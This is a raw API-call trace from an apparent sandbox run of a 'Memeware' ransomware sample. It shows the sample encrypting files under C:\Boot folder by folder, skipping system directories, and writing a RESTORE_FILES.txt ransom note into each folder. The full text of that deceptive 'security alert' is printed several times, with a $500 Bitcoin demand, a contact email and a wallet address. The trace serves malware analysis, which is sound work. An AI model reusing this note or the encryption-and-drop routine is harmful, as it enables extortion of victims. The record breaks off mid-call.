[0044.700] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.700] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.701] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.701] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.701] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\RESTORE_FILES.txt") returned 35 [0044.701] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ja-jp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.701] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.701] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.702] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.702] WriteFile (in: hFile=0xac, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.702] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.702] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.702] CloseHandle (hObject=0xac) returned 1 [0044.702] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files (x86)") returned -1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0044.702] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0044.702] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0044.702] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0044.702] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0044.702] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0044.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.703] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0044.703] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.703] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.703] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0044.703] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.703] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.703] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.703] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0044.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.704] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.704] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0044.704] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.704] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="RESTORE_FILES.txt") returned -1 [0044.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.704] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.704] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.704] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.704] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\RESTORE_FILES.txt") returned 35 [0044.704] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\ko-kr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.704] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.704] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.705] lstrlenA (lpString="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") returned 684 [0044.705] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.705] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.705] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.705] CloseHandle (hObject=0xac) returned 1 [0044.705] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Windows") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="Program Files (x86)") returned -1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="$Recycle.bin") returned 1 [0044.706] lstrcmpiW (lpString1="memtest.exe", lpString2="System Volume Information") returned -1 [0044.706] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0044.706] StrStrIW (lpFirst="memtest.exe", lpSrch=".protected") returned 0x0 [0044.706] lstrcmpW (lpString1="memtest.exe", lpString2="RESTORE_FILES.txt") returned -1 [0044.706] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.706] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.706] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.706] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files (x86)") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="$Recycle.bin") returned 1 [0044.706] lstrcmpiW 
(lpString1="nb-NO", lpString2="System Volume Information") returned -1 [0044.706] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0044.706] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0044.706] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0044.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.707] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.707] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0044.707] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.707] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.707] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0044.708] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.708] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.708] FindNextFileW (in: 
hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.708] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0044.708] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.708] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.708] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.708] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.709] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.709] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.709] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\RESTORE_FILES.txt") returned 35 [0044.709] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\RESTORE_FILES.txt" (normalized: "c:\\boot\\nb-no\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.709] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.709] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.710] lstrlenA (lpString="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") returned 684 [0044.710] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.710] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.710] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.710] CloseHandle (hObject=0xac) returned 1 [0044.710] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files (x86)") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="$Recycle.bin") returned 1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="System Volume Information") returned -1 [0044.710] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0044.710] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0044.710] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0044.710] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0044.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.710] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.710] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.710] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.710] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.710] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.710] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0044.710] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.710] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0044.711] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.711] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.711] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0044.711] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.711] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="RESTORE_FILES.txt") returned -1 [0044.711] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.711] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.711] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.711] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\RESTORE_FILES.txt") returned 35 [0044.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\RESTORE_FILES.txt" (normalized: "c:\\boot\\nl-nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.712] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.712] lstrlenA (lpString="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") returned 684 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.712] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 